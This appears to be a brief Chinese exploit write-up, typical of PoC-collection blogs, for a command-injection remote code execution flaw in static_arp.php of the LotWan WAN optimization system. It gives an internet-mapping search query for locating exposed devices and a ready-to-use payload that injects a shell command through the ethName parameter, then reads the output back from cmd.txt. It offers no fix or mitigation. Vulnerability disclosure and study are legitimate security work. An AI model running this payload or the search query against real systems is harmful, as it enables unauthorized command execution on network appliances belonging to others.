华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞

漏洞描述

华夏创新 LotWan广域网优化系统 static_arp.php文件参数 ethName存在命令拼接,导致远程命令执行漏洞。

漏洞影响

华夏创新 LotWan广域网优化系统

网络测绘

title=”LotWan 广域网优化系统”

漏洞复现

登录页面

20240327110744164-1635942598942-6671fa50-5052-43f6-ab40-bf2c8403bdf8.cd406953_2024-03-27_11-07-25 (1)

存在漏洞的文件为

/acc/bindipmac/static_arp.php?ethName=||id>cmd.txt||

20240327111323814-1635942680846-eb442f59-4229-43ad-a133-5c5587d20774.579e9d29_2024-03-27_11-12-59 (1)

再访问 /acc/bindipmac/cmd.txt

20240327111419569-1635942700371-15189d95-a643-4b0d-95bb-14f6285796d2.c9194d05_2024-03-27_11-13-52 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容